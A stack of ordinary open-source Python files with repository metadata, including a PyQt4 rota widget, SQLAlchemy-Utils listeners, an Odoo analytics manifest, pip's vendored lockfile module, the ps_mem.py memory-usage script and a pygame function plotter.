__author__ = 'Neil Butcher' from PyQt4 import QtCore, QtGui from model_population import PopulationModel from Rota_System.UI.widget_addDel_list import AddDelListWidget from widget_person import PersonWidget class PopulationWidget(QtGui.QWidget): commandIssued = QtCore.pyqtSignal(QtGui.QUndoCommand) criticalCommandIssued = QtCore.pyqtSignal() def __init__(self, parent=None): QtGui.QWidget.__init__(self, parent) self.layout = QtGui.QHBoxLayout(self) self.list_widget = AddDelListWidget(self) self.layout.addWidget(self.list_widget) self.person_widget = PersonWidget(self) self.layout.addWidget(self.person_widget) self.list_widget.objectSelected.connect(self.person_widget.person) self.person_widget.commandIssued.connect(self.emitCommand) self.person_widget.criticalCommandIssued.connect(self.emitCriticalCommand) def institution(self, institution): model = PopulationModel(institution) self.setModel(model) return model def setModel(self, model): self.list_widget.setModel(model) model.commandIssued.connect(self.emitCommand) model.criticalCommandIssued.connect(self.emitCriticalCommand) @QtCore.pyqtSlot(QtGui.QUndoCommand) def emitCommand(self, command): self.commandIssued.emit(command) @QtCore.pyqtSlot() def emitCriticalCommand(self): self.criticalCommandIssued.emit() from Rota_System.UI.model_undo import MasterUndoModel import sys from Rota_System.Institution import Institution def main(): i = Institution(None) model = PopulationModel(i) m = MasterUndoModel() app = QtGui.QApplication(sys.argv) w = PopulationWidget(None) m.add_command_contributer(w) w.setModel(model) w.show() sys.exit(app.exec_()) if __name__ == '__main__': main()
mit
williamfeng323/py-web
flask/lib/python3.6/site-packages/sqlalchemy_utils/listeners.py
2
7485
import sqlalchemy as sa from .exceptions import ImproperlyConfigured def coercion_listener(mapper, class_): """ Auto assigns coercing listener for all class properties which are of coerce capable type. """ for prop in mapper.iterate_properties: try: listener = prop.columns[0].type.coercion_listener except AttributeError: continue sa.event.listen( getattr(class_, prop.key), 'set', listener, retval=True ) def instant_defaults_listener(target, args, kwargs): for key, column in sa.inspect(target.__class__).columns.items(): if hasattr(column, 'default') and column.default is not None: if callable(column.default.arg): setattr(target, key, column.default.arg(target)) else: setattr(target, key, column.default.arg) def force_auto_coercion(mapper=None): """ Function that assigns automatic data type coercion for all classes which are of type of given mapper. The coercion is applied to all coercion capable properties. By default coercion is applied to all SQLAlchemy mappers. Before initializing your models you need to call force_auto_coercion. :: from sqlalchemy_utils import force_auto_coercion force_auto_coercion() Then define your models the usual way:: class Document(Base): __tablename__ = 'document' id = sa.Column(sa.Integer, autoincrement=True) name = sa.Column(sa.Unicode(50)) background_color = sa.Column(ColorType) Now scalar values for coercion capable data types will convert to appropriate value objects:: document = Document() document.background_color = 'F5F5F5' document.background_color # Color object session.commit() A useful side-effect of this is that additional validation of data will be done on the moment it is being assigned to model objects. For example without auto coerction set, an invalid :class:`sqlalchemy_utils.types.IPAddressType` (eg. ``10.0.0 255.255``) would get through without an exception being raised. The database wouldn't notice this (as most databases don't have a native type for an IP address, so they're usually just stored as a string), and the ``ipaddress/ipaddr`` package uses a string field as well. :param mapper: The mapper which the automatic data type coercion should be applied to """ if mapper is None: mapper = sa.orm.mapper sa.event.listen(mapper, 'mapper_configured', coercion_listener) def force_instant_defaults(mapper=None): """ Function that assigns object column defaults on object initialization time. By default calling this function applies instant defaults to all your models. Setting up instant defaults:: from sqlalchemy_utils import force_instant_defaults force_instant_defaults() Example usage:: class Document(Base): __tablename__ = 'document' id = sa.Column(sa.Integer, autoincrement=True) name = sa.Column(sa.Unicode(50)) created_at = sa.Column(sa.DateTime, default=datetime.now) document = Document() document.created_at # datetime object :param mapper: The mapper which the automatic instant defaults forcing should be applied to """ if mapper is None: mapper = sa.orm.mapper sa.event.listen(mapper, 'init', instant_defaults_listener) def auto_delete_orphans(attr): """ Delete orphans for given SQLAlchemy model attribute. This function can be used for deleting many-to-many associated orphans easily. For more information see https://bitbucket.org/zzzeek/sqlalchemy/wiki/UsageRecipes/ManyToManyOrphan. Consider the following model definition: :: from sqlalchemy.ext.associationproxy import association_proxy from sqlalchemy import * from sqlalchemy.orm import * from sqlalchemy.ext.declarative import declarative_base from sqlalchemy import event Base = declarative_base() tagging = Table( 'tagging', Base.metadata, Column( 'tag_id', Integer, ForeignKey('tag.id', ondelete='CASCADE'), primary_key=True ), Column( 'entry_id', Integer, ForeignKey('entry.id', ondelete='CASCADE'), primary_key=True ) ) class Tag(Base): __tablename__ = 'tag' id = Column(Integer, primary_key=True) name = Column(String(100), unique=True, nullable=False) def __init__(self, name=None): self.name = name class Entry(Base): __tablename__ = 'entry' id = Column(Integer, primary_key=True) tags = relationship( 'Tag', secondary=tagging, backref='entries' ) Now lets say we want to delete the tags if all their parents get deleted ( all Entry objects get deleted). This can be achieved as follows: :: from sqlalchemy_utils import auto_delete_orphans auto_delete_orphans(Entry.tags) After we've set up this listener we can see it in action. :: e = create_engine('sqlite://') Base.metadata.create_all(e) s = Session(e) r1 = Entry() r2 = Entry() r3 = Entry() t1, t2, t3, t4 = Tag('t1'), Tag('t2'), Tag('t3'), Tag('t4') r1.tags.extend([t1, t2]) r2.tags.extend([t2, t3]) r3.tags.extend([t4]) s.add_all([r1, r2, r3]) assert s.query(Tag).count() == 4 r2.tags.remove(t2) assert s.query(Tag).count() == 4 r1.tags.remove(t2) assert s.query(Tag).count() == 3 r1.tags.remove(t1) assert s.query(Tag).count() == 2 .. versionadded: 0.26.4 :param attr: Association relationship attribute to auto delete orphans from """ parent_class = attr.parent.class_ target_class = attr.property.mapper.class_ backref = attr.property.backref if not backref: raise ImproperlyConfigured( 'The relationship argument given for auto_delete_orphans needs to ' 'have a backref relationship set.' ) if isinstance(backref, tuple): backref = backref[0] @sa.event.listens_for(sa.orm.Session, 'after_flush') def delete_orphan_listener(session, ctx): # Look through Session state to see if we want to emit a DELETE for # orphans orphans_found = ( any( isinstance(obj, parent_class) and sa.orm.attributes.get_history(obj, attr.key).deleted for obj in session.dirty ) or any( isinstance(obj, parent_class) for obj in session.deleted ) ) if orphans_found: # Emit a DELETE for all orphans ( session.query(target_class) .filter( ~getattr(target_class, backref).any() ) .delete(synchronize_session=False) )
mit
BT-astauder/odoo
addons/web_analytics/__openerp__.py
305
1432
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2010-2012 OpenERP s.a. (<http://openerp.com>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## { 'name': 'Google Analytics', 'version': '1.0', 'category': 'Tools', 'complexity': "easy", 'description': """ Google Analytics. ================= Collects web application usage with Google Analytics. """, 'author': 'OpenERP SA', 'website': 'https://www.odoo.com/page/website-builder', 'depends': ['web'], 'data': [ 'views/web_analytics.xml', ], 'installable': True, 'active': False, }
agpl-3.0
brianwoo/django-tutorial
ENV/lib/python2.7/site-packages/pip/_vendor/lockfile/__init__.py
475
9162
""" lockfile.py - Platform-independent advisory file locks. Requires Python 2.5 unless you apply 2.4.diff Locking is done on a per-thread basis instead of a per-process basis. Usage: >>> lock = LockFile('somefile') >>> try: ... lock.acquire() ... except AlreadyLocked: ... print 'somefile', 'is locked already.' ... except LockFailed: ... print 'somefile', 'can\\'t be locked.' ... else: ... print 'got lock' got lock >>> print lock.is_locked() True >>> lock.release() >>> lock = LockFile('somefile') >>> print lock.is_locked() False >>> with lock: ... print lock.is_locked() True >>> print lock.is_locked() False >>> lock = LockFile('somefile') >>> # It is okay to lock twice from the same thread... >>> with lock: ... lock.acquire() ... >>> # Though no counter is kept, so you can't unlock multiple times... >>> print lock.is_locked() False Exceptions: Error - base class for other exceptions LockError - base class for all locking exceptions AlreadyLocked - Another thread or process already holds the lock LockFailed - Lock failed for some other reason UnlockError - base class for all unlocking exceptions AlreadyUnlocked - File was not locked. NotMyLock - File was locked but not by the current thread/process """ from __future__ import absolute_import import sys import socket import os import threading import time import urllib import warnings import functools # Work with PEP8 and non-PEP8 versions of threading module. if not hasattr(threading, "current_thread"): threading.current_thread = threading.currentThread if not hasattr(threading.Thread, "get_name"): threading.Thread.get_name = threading.Thread.getName __all__ = ['Error', 'LockError', 'LockTimeout', 'AlreadyLocked', 'LockFailed', 'UnlockError', 'NotLocked', 'NotMyLock', 'LinkLockFile', 'MkdirLockFile', 'SQLiteLockFile', 'LockBase', 'locked'] class Error(Exception): """ Base class for other exceptions. >>> try: ... raise Error ... except Exception: ... pass """ pass class LockError(Error): """ Base class for error arising from attempts to acquire the lock. >>> try: ... raise LockError ... except Error: ... pass """ pass class LockTimeout(LockError): """Raised when lock creation fails within a user-defined period of time. >>> try: ... raise LockTimeout ... except LockError: ... pass """ pass class AlreadyLocked(LockError): """Some other thread/process is locking the file. >>> try: ... raise AlreadyLocked ... except LockError: ... pass """ pass class LockFailed(LockError): """Lock file creation failed for some other reason. >>> try: ... raise LockFailed ... except LockError: ... pass """ pass class UnlockError(Error): """ Base class for errors arising from attempts to release the lock. >>> try: ... raise UnlockError ... except Error: ... pass """ pass class NotLocked(UnlockError): """Raised when an attempt is made to unlock an unlocked file. >>> try: ... raise NotLocked ... except UnlockError: ... pass """ pass class NotMyLock(UnlockError): """Raised when an attempt is made to unlock a file someone else locked. >>> try: ... raise NotMyLock ... except UnlockError: ... pass """ pass class LockBase: """Base class for platform-specific lock classes.""" def __init__(self, path, threaded=True, timeout=None): """ >>> lock = LockBase('somefile') >>> lock = LockBase('somefile', threaded=False) """ self.path = path self.lock_file = os.path.abspath(path) + ".lock" self.hostname = socket.gethostname() self.pid = os.getpid() if threaded: t = threading.current_thread() # Thread objects in Python 2.4 and earlier do not have ident # attrs. Worm around that. ident = getattr(t, "ident", hash(t)) self.tname = "-%x" % (ident & 0xffffffff) else: self.tname = "" dirname = os.path.dirname(self.lock_file) # unique name is mostly about the current process, but must # also contain the path -- otherwise, two adjacent locked # files conflict (one file gets locked, creating lock-file and # unique file, the other one gets locked, creating lock-file # and overwriting the already existing lock-file, then one # gets unlocked, deleting both lock-file and unique file, # finally the last lock errors out upon releasing. self.unique_name = os.path.join(dirname, "%s%s.%s%s" % (self.hostname, self.tname, self.pid, hash(self.path))) self.timeout = timeout def acquire(self, timeout=None): """ Acquire the lock. * If timeout is omitted (or None), wait forever trying to lock the file. * If timeout > 0, try to acquire the lock for that many seconds. If the lock period expires and the file is still locked, raise LockTimeout. * If timeout <= 0, raise AlreadyLocked immediately if the file is already locked. """ raise NotImplemented("implement in subclass") def release(self): """ Release the lock. If the file is not locked, raise NotLocked. """ raise NotImplemented("implement in subclass") def is_locked(self): """ Tell whether or not the file is locked. """ raise NotImplemented("implement in subclass") def i_am_locking(self): """ Return True if this object is locking the file. """ raise NotImplemented("implement in subclass") def break_lock(self): """ Remove a lock. Useful if a locking thread failed to unlock. """ raise NotImplemented("implement in subclass") def __enter__(self): """ Context manager support. """ self.acquire() return self def __exit__(self, *_exc): """ Context manager support. """ self.release() def __repr__(self): return "<%s: %r -- %r>" % (self.__class__.__name__, self.unique_name, self.path) def _fl_helper(cls, mod, *args, **kwds): warnings.warn("Import from %s module instead of lockfile package" % mod, DeprecationWarning, stacklevel=2) # This is a bit funky, but it's only for awhile. The way the unit tests # are constructed this function winds up as an unbound method, so it # actually takes three args, not two. We want to toss out self. if not isinstance(args[0], str): # We are testing, avoid the first arg args = args[1:] if len(args) == 1 and not kwds: kwds["threaded"] = True return cls(*args, **kwds) def LinkFileLock(*args, **kwds): """Factory function provided for backwards compatibility. Do not use in new code. Instead, import LinkLockFile from the lockfile.linklockfile module. """ from . import linklockfile return _fl_helper(linklockfile.LinkLockFile, "lockfile.linklockfile", *args, **kwds) def MkdirFileLock(*args, **kwds): """Factory function provided for backwards compatibility. Do not use in new code. Instead, import MkdirLockFile from the lockfile.mkdirlockfile module. """ from . import mkdirlockfile return _fl_helper(mkdirlockfile.MkdirLockFile, "lockfile.mkdirlockfile", *args, **kwds) def SQLiteFileLock(*args, **kwds): """Factory function provided for backwards compatibility. Do not use in new code. Instead, import SQLiteLockFile from the lockfile.mkdirlockfile module. """ from . import sqlitelockfile return _fl_helper(sqlitelockfile.SQLiteLockFile, "lockfile.sqlitelockfile", *args, **kwds) def locked(path, timeout=None): """Decorator which enables locks for decorated function. Arguments: - path: path for lockfile. - timeout (optional): Timeout for acquiring lock. Usage: @locked('/var/run/myname', timeout=0) def myname(...): ... """ def decor(func): @functools.wraps(func) def wrapper(*args, **kwargs): lock = FileLock(path, timeout=timeout) lock.acquire() try: return func(*args, **kwargs) finally: lock.release() return wrapper return decor if hasattr(os, "link"): from . import linklockfile as _llf LockFile = _llf.LinkLockFile else: from . import mkdirlockfile as _mlf LockFile = _mlf.MkdirLockFile FileLock = LockFile
gpl-3.0
Boedaxbayah-vpn/boedaxbayah
ps_mem.py
3
17568
#!/usr/bin/env python # Try to determine how much RAM is currently being used per program. # Note per _program_, not per process. So for example this script # will report RAM used by all httpd process together. In detail it reports: # sum(private RAM for program processes) + sum(Shared RAM for program processes) # The shared RAM is problematic to calculate, and this script automatically # selects the most accurate method available for your kernel. # Licence: LGPLv2 # Author: [email protected] # Source: http://www.pixelbeat.org/scripts/ps_mem.py # V1.0 06 Jul 2005 Initial release # V1.1 11 Aug 2006 root permission required for accuracy # V1.2 08 Nov 2006 Add total to output # Use KiB,MiB,... for units rather than K,M,... # V1.3 22 Nov 2006 Ignore shared col from /proc/$pid/statm for # 2.6 kernels up to and including 2.6.9. # There it represented the total file backed extent # V1.4 23 Nov 2006 Remove total from output as it's meaningless # (the shared values overlap with other programs). # Display the shared column. This extra info is # useful, especially as it overlaps between programs. # V1.5 26 Mar 2007 Remove redundant recursion from human() # V1.6 05 Jun 2007 Also report number of processes with a given name. # Patch from [email protected] # V1.7 20 Sep 2007 Use PSS from /proc/$pid/smaps if available, which # fixes some over-estimation and allows totalling. # Enumerate the PIDs directly rather than using ps, # which fixes the possible race between reading # RSS with ps, and shared memory with this program. # Also we can show non truncated command names. # V1.8 28 Sep 2007 More accurate matching for stats in /proc/$pid/smaps # as otherwise could match libraries causing a crash. # Patch from [email protected] # V1.9 20 Feb 2008 Fix invalid values reported when PSS is available. # Reported by Andrey Borzenkov <[email protected]> # V3.3 24 Jun 2014 # http://github.com/pixelb/scripts/commits/master/scripts/ps_mem.py # Notes: # # All interpreted programs where the interpreter is started # by the shell or with env, will be merged to the interpreter # (as that's what's given to exec). For e.g. all python programs # starting with "#!/usr/bin/env python" will be grouped under python. # You can change this by using the full command line but that will # have the undesirable affect of splitting up programs started with # differing parameters (for e.g. mingetty tty[1-6]). # # For 2.6 kernels up to and including 2.6.13 and later 2.4 redhat kernels # (rmap vm without smaps) it can not be accurately determined how many pages # are shared between processes in general or within a program in our case: # http://lkml.org/lkml/2005/7/6/250 # A warning is printed if overestimation is possible. # In addition for 2.6 kernels up to 2.6.9 inclusive, the shared # value in /proc/$pid/statm is the total file-backed extent of a process. # We ignore that, introducing more overestimation, again printing a warning. # Since kernel 2.6.23-rc8-mm1 PSS is available in smaps, which allows # us to calculate a more accurate value for the total RAM used by programs. # # Programs that use CLONE_VM without CLONE_THREAD are discounted by assuming # they're the only programs that have the same /proc/$PID/smaps file for # each instance. This will fail if there are multiple real instances of a # program that then use CLONE_VM without CLONE_THREAD, or if a clone changes # its memory map while we're checksumming each /proc/$PID/smaps. # # I don't take account of memory allocated for a program # by other programs. For e.g. memory used in the X server for # a program could be determined, but is not. # # FreeBSD is supported if linprocfs is mounted at /compat/linux/proc/ # FreeBSD 8.0 supports up to a level of Linux 2.6.16 import getopt import time import errno import os import sys try: # md5 module is deprecated on python 2.6 # so try the newer hashlib first import hashlib md5_new = hashlib.md5 except ImportError: import md5 md5_new = md5.new # The following exits cleanly on Ctrl-C or EPIPE # while treating other exceptions as before. def std_exceptions(etype, value, tb): sys.excepthook = sys.__excepthook__ if issubclass(etype, KeyboardInterrupt): pass elif issubclass(etype, IOError) and value.errno == errno.EPIPE: pass else: sys.__excepthook__(etype, value, tb) sys.excepthook = std_exceptions # # Define some global variables # PAGESIZE = os.sysconf("SC_PAGE_SIZE") / 1024 #KiB our_pid = os.getpid() have_pss = 0 class Proc: def __init__(self): uname = os.uname() if uname[0] == "FreeBSD": self.proc = '/compat/linux/proc' else: self.proc = '/proc' def path(self, *args): return os.path.join(self.proc, *(str(a) for a in args)) def open(self, *args): try: return open(self.path(*args)) except (IOError, OSError): val = sys.exc_info()[1] if (val.errno == errno.ENOENT or # kernel thread or process gone val.errno == errno.EPERM): raise LookupError raise proc = Proc() # # Functions # def parse_options(): try: long_options = ['split-args', 'help', 'total'] opts, args = getopt.getopt(sys.argv[1:], "shtp:w:", long_options) except getopt.GetoptError: sys.stderr.write(help()) sys.exit(3) # ps_mem.py options split_args = False pids_to_show = None watch = None only_total = False for o, a in opts: if o in ('-s', '--split-args'): split_args = True if o in ('-t', '--total'): only_total = True if o in ('-h', '--help'): sys.stdout.write(help()) sys.exit(0) if o in ('-p',): try: pids_to_show = [int(x) for x in a.split(',')] except: sys.stderr.write(help()) sys.exit(3) if o in ('-w',): try: watch = int(a) except: sys.stderr.write(help()) sys.exit(3) return (split_args, pids_to_show, watch, only_total) def help(): help_msg = 'ps_mem.py - Show process memory usage\n'\ '\n'\ '-h Show this help\n'\ '-w <N> Measure and show process memory every N seconds\n'\ '-p <pid>[,pid2,...pidN] Only show memory usage PIDs in the specified list\n' \ '-s, --split-args Show and separate by, all command line arguments\n' \ '-t, --total Show only the total value\n' return help_msg #(major,minor,release) def kernel_ver(): kv = proc.open('sys/kernel/osrelease').readline().split(".")[:3] last = len(kv) if last == 2: kv.append('0') last -= 1 while last > 0: for char in "-_": kv[last] = kv[last].split(char)[0] try: int(kv[last]) except: kv[last] = 0 last -= 1 return (int(kv[0]), int(kv[1]), int(kv[2])) #return Private,Shared #Note shared is always a subset of rss (trs is not always) def getMemStats(pid): global have_pss mem_id = pid #unique Private_lines = [] Shared_lines = [] Pss_lines = [] Rss = (int(proc.open(pid, 'statm').readline().split()[1]) * PAGESIZE) if os.path.exists(proc.path(pid, 'smaps')): #stat digester = md5_new() for line in proc.open(pid, 'smaps').readlines(): #open # Note we checksum smaps as maps is usually but # not always different for separate processes. digester.update(line.encode('latin1')) if line.startswith("Shared"): Shared_lines.append(line) elif line.startswith("Private"): Private_lines.append(line) elif line.startswith("Pss"): have_pss = 1 Pss_lines.append(line) mem_id = digester.hexdigest() Shared = sum([int(line.split()[1]) for line in Shared_lines]) Private = sum([int(line.split()[1]) for line in Private_lines]) #Note Shared + Private = Rss above #The Rss in smaps includes video card mem etc. if have_pss: pss_adjust = 0.5 # add 0.5KiB as this avg error due to trunctation Pss = sum([float(line.split()[1])+pss_adjust for line in Pss_lines]) Shared = Pss - Private elif (2,6,1) <= kernel_ver() <= (2,6,9): Shared = 0 #lots of overestimation, but what can we do? Private = Rss else: Shared = int(proc.open(pid, 'statm').readline().split()[2]) Shared *= PAGESIZE Private = Rss - Shared return (Private, Shared, mem_id) def getCmdName(pid, split_args): cmdline = proc.open(pid, 'cmdline').read().split("\0") if cmdline[-1] == '' and len(cmdline) > 1: cmdline = cmdline[:-1] path = proc.path(pid, 'exe') try: path = os.readlink(path) # Some symlink targets were seen to contain NULs on RHEL 5 at least # https://github.com/pixelb/scripts/pull/10, so take string up to NUL path = path.split('\0')[0] except OSError: val = sys.exc_info()[1] if (val.errno == errno.ENOENT or # either kernel thread or process gone val.errno == errno.EPERM): raise LookupError raise if split_args: return " ".join(cmdline) if path.endswith(" (deleted)"): path = path[:-10] if os.path.exists(path): path += " [updated]" else: #The path could be have prelink stuff so try cmdline #which might have the full path present. This helped for: #/usr/libexec/notification-area-applet.#prelink#.fX7LCT (deleted) if os.path.exists(cmdline[0]): path = cmdline[0] + " [updated]" else: path += " [deleted]" exe = os.path.basename(path) cmd = proc.open(pid, 'status').readline()[6:-1] if exe.startswith(cmd): cmd = exe #show non truncated version #Note because we show the non truncated name #one can have separated programs as follows: #584.0 KiB + 1.0 MiB = 1.6 MiB mozilla-thunder (exe -> bash) # 56.0 MiB + 22.2 MiB = 78.2 MiB mozilla-thunderbird-bin return cmd #The following matches "du -h" output #see also human.py def human(num, power="Ki"): powers = ["Ki", "Mi", "Gi", "Ti"] while num >= 1000: #4 digits num /= 1024.0 power = powers[powers.index(power)+1] return "%.1f %s" % (num, power) def cmd_with_count(cmd, count): if count > 1: return "%s (%u)" % (cmd, count) else: return cmd #Warn of possible inaccuracies #2 = accurate & can total #1 = accurate only considering each process in isolation #0 = some shared mem not reported #-1= all shared mem not reported def shared_val_accuracy(): """http://wiki.apache.org/spamassassin/TopSharedMemoryBug""" kv = kernel_ver() if kv[:2] == (2,4): if proc.open('meminfo').read().find("Inact_") == -1: return 1 return 0 elif kv[:2] == (2,6): pid = os.getpid() if os.path.exists(proc.path(pid, 'smaps')): if proc.open(pid, 'smaps').read().find("Pss:")!=-1: return 2 else: return 1 if (2,6,1) <= kv <= (2,6,9): return -1 return 0 elif kv[0] > 2: return 2 else: return 1 def show_shared_val_accuracy( possible_inacc, only_total=False ): level = ("Warning","Error")[only_total] if possible_inacc == -1: sys.stderr.write( "%s: Shared memory is not reported by this system.\n" % level ) sys.stderr.write( "Values reported will be too large, and totals are not reported\n" ) elif possible_inacc == 0: sys.stderr.write( "%s: Shared memory is not reported accurately by this system.\n" % level ) sys.stderr.write( "Values reported could be too large, and totals are not reported\n" ) elif possible_inacc == 1: sys.stderr.write( "%s: Shared memory is slightly over-estimated by this system\n" "for each program, so totals are not reported.\n" % level ) sys.stderr.close() if only_total and possible_inacc != 2: sys.exit(1) def get_memory_usage( pids_to_show, split_args, include_self=False, only_self=False ): cmds = {} shareds = {} mem_ids = {} count = {} for pid in os.listdir(proc.path('')): if not pid.isdigit(): continue pid = int(pid) # Some filters if only_self and pid != our_pid: continue if pid == our_pid and not include_self: continue if pids_to_show is not None and pid not in pids_to_show: continue try: cmd = getCmdName(pid, split_args) except LookupError: #operation not permitted #kernel threads don't have exe links or #process gone continue try: private, shared, mem_id = getMemStats(pid) except RuntimeError: continue #process gone if shareds.get(cmd): if have_pss: #add shared portion of PSS together shareds[cmd] += shared elif shareds[cmd] < shared: #just take largest shared val shareds[cmd] = shared else: shareds[cmd] = shared cmds[cmd] = cmds.setdefault(cmd, 0) + private if cmd in count: count[cmd] += 1 else: count[cmd] = 1 mem_ids.setdefault(cmd, {}).update({mem_id:None}) #Add shared mem for each program total = 0 for cmd in cmds: cmd_count = count[cmd] if len(mem_ids[cmd]) == 1 and cmd_count > 1: # Assume this program is using CLONE_VM without CLONE_THREAD # so only account for one of the processes cmds[cmd] /= cmd_count if have_pss: shareds[cmd] /= cmd_count cmds[cmd] = cmds[cmd] + shareds[cmd] total += cmds[cmd] #valid if PSS available sorted_cmds = sorted(cmds.items(), key=lambda x:x[1]) sorted_cmds = [x for x in sorted_cmds if x[1]] return sorted_cmds, shareds, count, total def print_header(): sys.stdout.write(" Private + Shared = RAM used\tProgram\n\n") def print_memory_usage(sorted_cmds, shareds, count, total): for cmd in sorted_cmds: sys.stdout.write("%8sB + %8sB = %8sB\t%s\n" % (human(cmd[1]-shareds[cmd[0]]), human(shareds[cmd[0]]), human(cmd[1]), cmd_with_count(cmd[0], count[cmd[0]]))) if have_pss: sys.stdout.write("%s\n%s%8sB\n%s\n" % ("-" * 33, " " * 24, human(total), "=" * 33)) def verify_environment(): if os.geteuid() != 0: sys.stderr.write("Sorry, root permission required.\n") if __name__ == '__main__': sys.stderr.close() sys.exit(1) try: kv = kernel_ver() except (IOError, OSError): val = sys.exc_info()[1] if val.errno == errno.ENOENT: sys.stderr.write( "Couldn't access " + proc.path('') + "\n" "Only GNU/Linux and FreeBSD (with linprocfs) are supported\n") sys.exit(2) else: raise if __name__ == '__main__': verify_environment() split_args, pids_to_show, watch, only_total = parse_options() if not only_total: print_header() if watch is not None: try: sorted_cmds = True while sorted_cmds: sorted_cmds, shareds, count, total = get_memory_usage( pids_to_show, split_args ) if only_total and have_pss: sys.stdout.write(human(total).replace(' ','')+'B\n') elif not only_total: print_memory_usage(sorted_cmds, shareds, count, total) time.sleep(watch) else: sys.stdout.write('Process does not exist anymore.\n') except KeyboardInterrupt: pass else: # This is the default behavior sorted_cmds, shareds, count, total = get_memory_usage( pids_to_show, split_args ) if only_total and have_pss: sys.stdout.write(human(total).replace(' ','')+'B\n') elif not only_total: print_memory_usage(sorted_cmds, shareds, count, total) # We must close explicitly, so that any EPIPE exception # is handled by our excepthook, rather than the default # one which is reenabled after this script finishes. sys.stdout.close() vm_accuracy = shared_val_accuracy() show_shared_val_accuracy( vm_accuracy, only_total )
gpl-3.0
introprogramming/exercises
exercises/plot_2d/plot_2d.py
1
5835
import math, pygame from pygame.locals import * ############################################# ## Standard colors (RGB) BLACK = (20, 20, 40) WHITE = (255, 255, 255) BLUE = (0, 0, 255) GREEN = (0, 255, 0) RED = (255, 0, 0) ############################################# ## Customize plot here def function_to_print(x): """Write function to plot here. Must take a single number x and return a single number y.""" return -x * (x - 3) # Range of window X_MIN = 0.0 X_MAX = 10.0 Y_MIN = -10.0 Y_MAX = 10.0 # Tick interval on axes X_TICK = 2.5 Y_TICK = 2.5 # Granularity of plotted functions, more points -> higher resolution plot N_POINTS = 100 # Colors background_color = BLACK plot_color = GREEN grid_color = WHITE # Note, it is also possible to make a list of functions to print # and respective colors: # functions = [(f1, color1), (f2, color2), ...] ############################################# ## Let the program calculate the rest WIDTH = 640 HEIGHT = 480 X_SIZE = X_MAX - X_MIN Y_SIZE = Y_MAX - Y_MIN def coordinate_to_position(c): """Converts a model coordinate (vector) into a graphic position (pixel)""" gx = (c[0] - X_MIN) * WIDTH / X_SIZE gy = HEIGHT - (c[1] - Y_MIN) * HEIGHT / Y_SIZE return gx, gy def curve_coordinates(f, x0, x1, points): """Returns list of coordinates Creates linear splines for this function f, from x0 to x1 Length of returned list == points.""" coordinates = [] x = x0 delta = (x1 - x0) / (points - 1) while x <= x1: coordinates += [[x, f(x)]] x += delta return coordinates def linspace(x0, x1, points): """Returns a list of numbers of `points` elements, with constant intervals between `x0` and `x1`""" delta = (x1 - x0) / (points - 1) return map(lambda x: x0 + delta * x, range(points)) def curve_coordinates2(f, x0, x1, points): """(Alternative implementation): This is more compact and functional-like.""" return [[x, f(x)] for x in linspace(x0, x1, points)] def draw_ticks(screen, axis): """Draws appropriate ticks on the specified axis. axis == 0 -> X-axis, otherwise Y-axis. This implementation is not so readable, see alternative implementation for a more readable one.""" if axis == 0: min = X_MIN max = X_MAX tick = X_TICK limit = HEIGHT else: axis = 1 min = Y_MIN max = Y_MAX tick = Y_TICK limit = WIDTH start = min + min % tick end = max - max % tick points = (end - start) / tick + 1 t = limit / 120 for x in linspace(start, end, int(points)): c = [0, 0] c[axis] = x v = coordinate_to_position(c) a = v[1 - axis] + t if a > limit: a = limit b = v[1 - axis] - t if b < 0: b = 0 # Copying v s = list(v) s[1 - axis] = a e = list(v) e[1 - axis] = b pygame.draw.line(screen, grid_color, s, e, 2) def draw_x_ticks(screen): """(Alternative implementation): Draws appropriate ticks on the X-axis.""" start = X_MIN + X_MIN % X_TICK end = X_MAX - X_MAX % X_TICK points = (end - start) / X_TICK + 1 # t == half length of the tick line t = HEIGHT / 120 # one iteration per tick for x in linspace(start, end, int(points)): v = coordinate_to_position([x, 0]) a = v[1] + t b = v[1] - t if a > HEIGHT: a = HEIGHT if b < 0: b = 0 pygame.draw.line(screen, grid_color, [v[0], a], [v[0], b], 2) def draw_y_ticks(screen): """(Alternative implementation): Draws appropriate ticks on the Y-axis. This function mirrors draw_x_ticks(...)""" start = Y_MIN + Y_MIN % Y_TICK end = Y_MAX - Y_MAX % Y_TICK points = (end - start) / Y_TICK + 1 t = WIDTH / 120 for y in linspace(start, end, int(points)): v = coordinate_to_position([0, y]) # print v a = v[0] + t b = v[0] - t if (a > WIDTH): a = WIDTH if (b < 0): b = 0 pygame.draw.line(screen, grid_color, [a, v[1]], [b, v[1]], 2) def draw(screen, pp, plot_color): """Plots the points `pp` on the specified screen with the specified color.""" # Function pygame.draw.lines(screen, plot_color, False, pp, 3) def draw_axis(screen): """Draws the axes and ticks of the coordinate system.""" ## Alternative implementations: # draw_x_ticks(screen) # draw_y_ticks(screen) draw_ticks(screen, 0) draw_ticks(screen, 1) x_points = list(map(coordinate_to_position, [[X_MIN, 0], [X_MAX, 0]])) y_points = list(map(coordinate_to_position, [[0, Y_MIN], [0, Y_MAX]])) # X-Axis pygame.draw.lines(screen, grid_color, False, x_points, 2) # Y-Axis pygame.draw.lines(screen, grid_color, False, y_points, 2) def main(): """Graphics: draws graphs on window and await EXIT or ESCAPE.""" pygame.init() screen = pygame.display.set_mode([WIDTH, HEIGHT]) pygame.display.set_caption('Plot 2d') clock = pygame.time.Clock() screen.fill(background_color) cc = curve_coordinates(function_to_print, X_MIN, X_MAX, N_POINTS) pp = list(map(coordinate_to_position, cc)) # This would typically be done inside the loop, but since it is never # updated: might as well keep it outside draw(screen, pp, plot_color) draw_axis(screen) done = False while not done: time = clock.tick(60) pygame.display.update() for e in pygame.event.get(): if e.type == QUIT or (e.type == KEYUP and e.key == K_ESCAPE): done = True break pygame.quit() # if Python says run... if __name__ == '__main__': main()
mit
hitchtest/hitchvagrant
hitchvagrant/vagrant.py
1
1317
